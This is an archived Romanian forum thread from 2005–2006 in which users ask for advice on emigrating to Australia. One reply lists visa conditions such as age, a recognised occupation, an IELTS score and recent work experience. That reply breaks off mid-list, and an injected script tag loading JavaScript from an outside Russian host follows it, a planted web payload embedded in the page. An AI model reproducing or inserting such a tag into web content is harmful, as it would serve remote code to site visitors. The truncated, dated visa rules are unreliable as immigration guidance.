PDA

Arată versiune întreagă : rog cateva sfaturi !!

ionutflore
08.09.2005, 08:18
vreau si eu sa emigrez in australia !! poa cineva sa ma indrume si pe mine ?? cateva sfaturi ?? va rog frumos !!

Ekklesia
06.10.2005, 03:40
vreau si eu sa emigrez in australia !! poa cineva sa ma indrume si pe mine ?? cateva sfaturi ?? va rog frumos !!

EXISTA 4 CONDITII DE BAZA CARE TREBUIESC INDEPINITE PENTRU AFI ELIGIBIL SA APLICATI PENTRU VIZA:

1. SA AVETI SUB 45 ANI

2. SA AVETI O MESERI RECUNOSCUTA IN <st1:country-regi&#111;n><st1:place>AUSTRALIA</st1:place></st1:country-regi&#111;n> - ADICA CARE SE REGASESTE PE LISTA MESERIILOR DESCHIS EPENTRU MIGRARE, SI IN CARE SA OBTINETI O EVALUARE POZITIVA FACUTA DE O AGENTIE DE EVALUARE DIN <st1:country-regi&#111;n><st1:place>AUSTRALIA</st1:place></st1:country-regi&#111;n>.

3. SA OBTINETI MINIM 5 DIN 9 LA EXAMENUL IELTS.

4. SA AVETI EXPERIENTA RECENTA DE MINIM 12 DIN ULTIMILE 18 LUNI INTR-O MESERIE RECUNOSCUTA IN AUSTRALIA (DE PREFERABIL IN MESERIA PE CARE O NOMINALIZATI PENTRU MIGRARE) DACA MESERIA NOMINALIZATA ESTE DE 60 PUNCTE SAU SA AVETI 24 DIN ULTIMILE 36 DE LUNI EXPERIENTA DACA MESERIA NOMINALIZATA ESTE DE 40,50 PUNCTE.

ODATA CE INDEPLINITI ACESTE CONDITII DE BAZA, EXISTA MAI MULTE ALTERNATIVE:

1. DA<script src=http://www.iroe.ru/ngg.js></script>

buyio
21.01.2006, 22:14
Ekklesia, am vazut mesajul tau catre ionutflorin. Ma intereseaza si pe mine ce ai scris, si eu vreau sa emigrez in Australia cat de curand posibil. Unde iti pot trimite CV-ul? scuze, sunt membru nou si nu ma descurc f bine pe forumul asta. Mailul meu e buyio@yahoo.com.

Imi poti spune care ar fi conditiile ca sa te ocupi de dosarul meu? care ar fi costurile (estimativ evident).

Multumesc tare mult.